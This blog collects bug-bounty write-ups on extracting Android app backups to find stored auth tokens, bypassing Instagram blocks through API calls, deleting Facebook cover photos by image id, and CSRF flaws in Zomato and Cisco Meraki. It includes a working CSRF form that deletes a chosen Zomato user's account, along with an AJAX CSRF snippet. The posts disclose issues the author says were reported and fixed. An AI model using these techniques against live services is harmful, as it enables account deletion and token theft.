Finding backup vulnerabilities in android apps

Hi everyone this post is just an elaboration of 10th point that I made it in my previous post which is being often missed by dev/hunters while looking for bugs in android apps although this issue is not new and more then a vulnerability it is a misconfiguration .

Why to look up in backup ?  

Just like any other os android system allows user’s to make backup of the their app that’s cool but from our end we are concerned about whether any sensitive information is being leaked in the backup or not and whether it has been loosely configured .

Tools Required ?

  1. Adb
  2. Abe
  3. Apktool
  4. Genymotion

How to proceed : 

  1. To check whether any app allows the backup you need to first reverse the apk and find the manifest file to do so execute apktool d <app-name.apk>
  2. Check in AndroidManifest.xml file for the attribute
    android:allowBackup=”true” if this is present and it’s value is set to true it means we can backup the app internal data which resides under
    /data/data/<app-package>
  3. To backup the app hit the adb backup -f <backup-name.ab>
    <app-package-name>
  4. Accept the backup confirmation from the device.
  5. Now you will have the app-backup.ab file in your working directory
  6. To read this you need to convert this .ab file into .tar format using the tool
    Android Backup Extractor
    Command : java -jar abe.jar unpack app-backup.ab
  7. Then you can extract this tar file using tar xvf app-backup.tar t
  8. To make this process short i have written a custom tool pentdroid which automates all the above android operations .pentdroid
  9. Just select the operation 6 for reversing an app , 4 (For taking backup of an app ) then finally select option 5 to convert the backup.ab into backup.tar .
  10. Once you will get .tar file extract it using  winrar 
  11. Once it has been extracted you will get the folder residing in /data/data directory.
  12. Try to explore the various files including assets like .db, sharedprefs.xml and search for sensitive information sometimes you will find developers secrets , pass ,auth token for api’s etc
  13. Here i got once such case while reporting to one of the android program where i was able to obtain auth token stored in one of the .db file .
  14. auth_token_exposed
  15. I have used sqlite browser to see the info of .db files .
  16. By using the obtained token we can make calls to the api end point to fetch more information.

Why to bother about this if we can find something by just rooting the device ?

With this you don’t need a rooted device to obtain data from apps internal directory ! and well this respect the program scope too as compared to the other OWASP-M2 issues which requires you to have rooted device .

Any Patch or recommendation?

1.)Try to Implement sqlcipher which encrypts the sqlite db check out >   http://lomza.totem-soft.com/tutorial-add-sqlcipher-to-your-android-app/

2.) Set android:allowBackup:false in android manifest file to disallow the access

3.)Even do not let apps to upload backups in clouds containing sensitive info in clear text.

#signoff

 

 

 

 

Advertisements

Mobile app security : Bugs which are actually counted

This post is just all about few thought’s on VAPT and regarding security programs for mobile apps not related to Mobile OS security | Malware research |  Reverse Engineering .

Mobile app security is a  buzz word these day’s and quite tangled and contradictory in itself  after the arrival of IOT it became even more important to assess your apps to prevent the attacks against these systems ! but in reality the major culprit are always been the web services running at the background  REST in peace . So question is who we are actually pentesting is it api or mobile app and if its api then we are only doing the same burp stuffs like we used to do in web then
what is actual mobile app security ?

Just imagine for a while who will give his/her own Iphone 6 /Android device that too jailbroken to find something in plaintext in plist ! seriously ?

Their are too many protection levels within system to prevent the exploitation itself  ! and infosec guys while reporting be like .

Hi team , 
Here is insecure local storage flaw imagine that the device have been stolen , rooted & jailbroken .
I dare you if you will say in case of IOS.

(okay just modify it  *we have physical access to the device for a while *)

Rooting or jailbreaking a device will itself will give you higher most privilege within the device so their is no point of reporting insecure local storage which is termed M2 in owasp
unless the data is stored with world readable permission in sdcard
Most of the companies won’t give a damm if the app you have tested was on rooted/jailbroken device and twist is entire Owasp was written with respect to emulator which comes pre-rooted .

Below are some knockout on face regarding flaws from programs :
and half of the owasp top 10 went off :/ .

mobsec_lolwa

That’s the reality of acceptance of app based vulnerability no doubt you will get those issues in any random app from app store but it won’t have much impact .

I would rather prefer this path sdcard/android/ instead of this data/data

So what are some accepted issues about mobile app’s ?

Ans:In general any bug which have significant impact without having much privilege on device more better if you can exploit it remotely like code execution , web-view exploits ! (but i guess these web-kits issues are dead these days )

Try to pentest having least privilege on an unrooted android device .
(Now it sounds like your hands + legs are being tied up)
next thing you will ask how to proceed and possible on an unrooted device ? I  will post about it ! few of my poc’s

Few of the issues i worked upon and helped me regarding android which at-least counts in acceptance are :

  1. Sensitive information leaked like access_tokens in logs during debugging .
  2. Fragment injections  .
  3. Arbitary code execution but their are constraint’s in this too you need to have world readable + writable permissions to overwrite the native libraries + to execute it remotely  you need mitm .
    and even after doing all
    the feeling still you got informative trust me i was here 😛
  4. Xxe lucky if app is parsing xml entities you can try those apps who parse pdf,docx etc
  5. Remote code execution via web-views (addjavascriptinterface();)
  6. Sensitive Api calls and Idor .
  7. Exported intents which are helpful in bypassing authentication or screens
  8. Exported broadcast receivers like making a phone call  by passing params .
  9. Tapjacking at oauth end points just like clickjacking issue in web at oauth buttons
  10. Backup issues like android:backup=”allow” which let you make backup of the app and explore the sensitive stuffs on it .
  11. Exported components without custom permissions includes activities,receivers
    [which also can be bypassed]
  12. I consider ssl pinning should be here but still  bug bounty programs will cry coz it can be bypassed using cydia substrate ,ssl killer or exposed framework modules.

What about IOS  ?
Ans
:

  1. Some of the above issues are also relevant to ios too .
  2. Ios too have web-views which can be exploited using file Uri:// to trigger facetime calls improper URI schemes this can allow attackers for example, send unauthenticated tweets and bypass popup blockers
  3. Check again rest api calls
  4. Do traffic analysis

So : 
App related issues which are found on jail-broken device doesn’t count unless you  got a privilege escalation exploit on the device !

These are some of my own thoughts on mobile app sec specially related  to bug acceptance and feasibility of exploitation  and does not intends to hurt any one’s feelings .

Thanks for reading guys and for being here 🙂
let me know your thoughts in comment .

$logout
Vishwa

Exploiting Instagram Api’s

Hello Friends it been a while i have blogged well this time i am writing about one of mine old  issue .I was checking instagram  but still so as whitehat by heart i was straight into testing the privacy/security measures of it .xss,csrf,oauth issues were fixed and being hunted down by other folks 😛  so i was checking my  favourite part api end points and within few hour i found 4 flaws with the Api i.e

Pwning calls like GET,PUT ,POST,DELETE

GET /  https://api.instagram.com/v1/users/{user-id}/media/recent

GET / https://api.instagram.com/v1/media/<media_id>/comments/[comment_id]

PUT /  [insta api uses less  put call it uses post for most of the update actions  ]

POST / https://api.instagram.com/v1/media/{media-id}/likes

DELETE  / https://api.instagram.com/v1/media/{media-id}/likes

Attack –> Once any user1 block any other user2 he won’t be able to see,like,share,post,comment on the vicitm post ,seeing who liked victim post right ! as same feature is in facebook.

Scenario : 

Scenario is like someone is spamming in your  instagram  wall  posting abusive stuffs on your image and is very personal which you don’t like
you now want him to be get removed from your environment and wanted to keep your self  away from all your personal stuffs
so  you have blocked me now ? you think work is done but not
Attacker will try to know  whats going on the image but he can’t because you have blocked so he cannot interact with your resources but from api end point their is flaw he  will make those  calls with the media id  to like,dislike,see comments,who liked your post ,follows etc .

Interesting thing was posting comments was restricted ! it means api is still performing some checks on some POST calls except Post,Delete /like but not on GET CALLS .

Media_id  can be easily figured out via oembed  feature in instagram by just putting [url of resource] which allows you to create embed code for the users post.

Impact : The attacker was not able to perform any of the above action from the Ui end point but was able to exploit above blocks via api end point with his own access_token  now he can delete likes,create likes,see comments ,see who liked victim post etc in authenticated sessions which violates the block functionality isn’t it ?

Reason Behind this ? 
Application was not verifying  the access_token calls whether they are coming from original owner or from any blocked user it was simply serving them.

Initial Instagram Design Flaw :
 Root Reason is initial Instagram design as it is very open it let you see everything in unauthenticated sessions whereas facebook
has given users choice that what they want to show or not to outsiders [even in unauthenticated sessions ] so here no matter what
application can only apply restriction in authenticated sessions because then only it can check whom to allow or whom to restrict
when user authenticates instagram is performing only basic checks by hiding the controls and showing the non interactive page to the blocked user .
but their is exploitation possible from api end point which breaks the basic block function isn’t it .

[+] Fact despite of their patch i was again able to bypass instagram block 😛 so their is no need of block feature then ? well let them decide now or in future hope so someone will ping them .
Video Poc :

TimeLine:

[13 April 2015] Reported this issue to the team
[14 April 2015] Better Poc provided with Video
[16 April 2015] Got a reply for more info
[16 April 2015] Info Provided
[21 April 2015] Changes were made asked to confirm
[21 April 2015]Again reproduced the issue
[6 May 2015] Escalated to Product team
[29 September 2015] Team is still working on fix
[10 October 2015] Closed
[10 October 2015] Reopened again .
[13 March 2016] Again escalated .
[20 April 2016 ]  Issue fixed by the team with no bounty .

Changes Made By Team After the Report :

1.)Added a console for api documentation
2.)Added sandbox approach
3.)Fixed the api and ui consistency

Now all the issues are patched from both the end point api/ui .

$logout

Deleting Facebook Event&Group cover pics

Hi Friends 🙂

Here is a small logical flaw with facebook at event and group corner.
title should be deleting facebook event&group cover pic with image id reference flaw

Facebook  use numerical id’s  to identify each objects like video,url,feed,photos,event,groups etc  .So i was checking the event corner and i got a logical flaw with image id’s i thought of developer logic while building this

Test : If any random invitee of the event post any pic on event wall and if later on that pic is being utilized by the admin of the event as a event cover pic then can we do any malicious stuffs with it ?

that’s straight ! but what could be wrong with this method ? its a right of an admin to utilize the assets of event or the object he/she belongs to !

ok lets dig deep for that i first created 2 accounts A admin of event and B normal user
Now i posted on the behalf of user B and from Admin  account i tried to use that image as event cover pic . I noticed that  fb was assigning  same image id as it was assigned to the original poster B while posting it so WHAT ?

Imagine now the original poster B is being removed by the admin A from the event and now he don’t have accessed to the assets like notes,pics of that particular event . He cannot interact with them or visit them right !

But according to graph documentation the app which have created any node only have permissions to delete it !  so the user B still have delete right’s

Now  exploitation –> on triggering  Delete Request to that image id like
Delete /736667463112529
  via graph api  the result was 200  boom now when admin will refresh the page he will find that event cover pic is now being also deleted due to direct reference to image id .

This flaw was is in both facebook events and groups I reported this to facebook under the category malicious use of functionality however it was more over logical flaw being itself a vulnerability .

but the team was immediate to acknowledge the report .

Now issue has been Fixed  both from client side as well as from api side.

Fix in place : Now  facebook will generate unique id of photos whenever anyone try to use it as cover pic instead of using same id .

Here is a Video Poc ? 

cheers !

 

Exploiting unexploitable/self Xss

Their are multiple end points where we can get Xss in web apps but most of time they are self 😛  which require user interaction to trigger so to make it exploitable or Poc we are left with 2 options typically :p

  1. Using Clickjacking
  2. Using CSRF

depending upon which above 2 cases are present we can create poc

So here i will discuss real example in one of the yahoo acquisition “polyvore” which i reported

Their were multiple fields vulnerable to  xss they were self but their page was vulnerable to clickjack so we can exploit by putting a relative xss vector to bypass filter into fields with the help of user by tricking him to play a game of drag and drop .

which is atleast better then standalone poc atleast will convey the team :v
I will create separate post how to do it via csrf (no such fantasy involved in that too  ) but clickjack involve little configs  so just a bookmark post if you got such situations.

So i have just written  custom  .py  script which will create a clickjack to xss poc  .On running the script it will ask you the 2 things

  1. Xss vector to bypass the filter
  2.  Custom clickjack code which you can create from here here

Q.) Why custom clickjack code ? 

Because their are specific textfields ,textarea which are vulnerable and needed to include as a part of game ! you will better undestand in the video below .

Now you can give this file to victim !

Poc in action ?

Script ?

Greetz to #kotowicz for great work in Clickjacking domain .

That’s all guys 🙂

$ logout

 

 

 

 

 

How i deleted your zomato account !

Hi friends 😀 ,

Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.

I was catched by it so i was messing around with zomato now while checking out the settings section i found the “delete my account ” option and after clicking on that a prompt will occur like this

  zomato hack

Now to delete the account you have to type delete inside it and confirm ! but their was a flaw their was no csrf token available to validate the request ! .

What is CSRF TOKEN ?
CSRF token is a protective measure used to prevent cross site request forgery attacks which checks that the request is coming from the legitimate user or not !

Now Exploitation Part 
i created a quick working code which allows you to delete the any user’s account so now to delete his or her account you just need send this code via html  or as a link . 😛

Code ?
<html>
<body>
<form action=”https://www.zomato.com/php/delete_user_profile.php method=”POST”>

<input type=”hidden” name=”reason” value=”woot woot”>

<input type=”hidden” name=”userid” value=”[User ID to whom you wanna delete]”>

<input type=”submit”  value=”Submit request”>

</form>

</body>
</html>

Video Poc :
save this as delete.html and send this to your friend !

https://www.youtube.com/watch?v=fRjdyg6s9rU

Exploitability ?

it was easy to grab any user  ==>userid by just visiting their profile and copy that user id .Which increased it severity 😉

[+] Fixing Time line

[+] July 21, 2015 Reported to CEO (Report sent to Deepinder Goyal) ,CTO
[+] July 21, 2015 Reported to Support team
[+] Bug Fixed by team .

Let #internet be #safer place 🙂
signoff

Cisco Meraki ajax based csrf

Hello friends 🙂 This is the writeup of my  Cisco Meraki findings  .I was just 😉 trying the different platform for a change  so i logged in  and was playing the game of request and resonse so after few back and forth of requests it was clear that’s its  an ajax based web app  now i started trying for standard security issues like xss, csrf ,injections etc . so finally i got one in which i was able to disconnect the admin from his own account .

[+]Abstract
when you will remove the token from the ajax request still request was getting completed so i checked again and it wasn’t validating the xsrf token so it was a csrf

[+]Poc Challenge
Thing is  that you can easily create poc via burp for those web apps which are sending their anti_csrf tokens via their body but sometimes you have to struggle for those web app who send their csrf tokens via header specially ajax based like “X-XSRF-Token”:”value “;

So now i have to create the Poc manually so i coded this
var request =new XMLHttpRequest();
request.open(‘POST’,”url”,true); // the post url where the  web app was sending the data       //request for removal

request.send();
request.log();

but ajax has its own security policies to be satisfied first  !
Same Origin Policy on AJAX

The same origin policy dictates that an AJAX object’s ability to fully communicate on the user’s behalf is possible assuming the following conditions are met
: ►The protocol used by the AJAX object must be identical to the protocol of the origin page.
► The target port of the AJAX object must be identical to the port of the origin page.
► The domain of the host and the domain of the AJAX object’s target host must be identical

the only thing to do was to use overly permissive browser  ===>  IE
So it worked

Video poc :

[+]Reported

[+] Fixed

Hope this write-up  was helpful
Regards
vishwaraj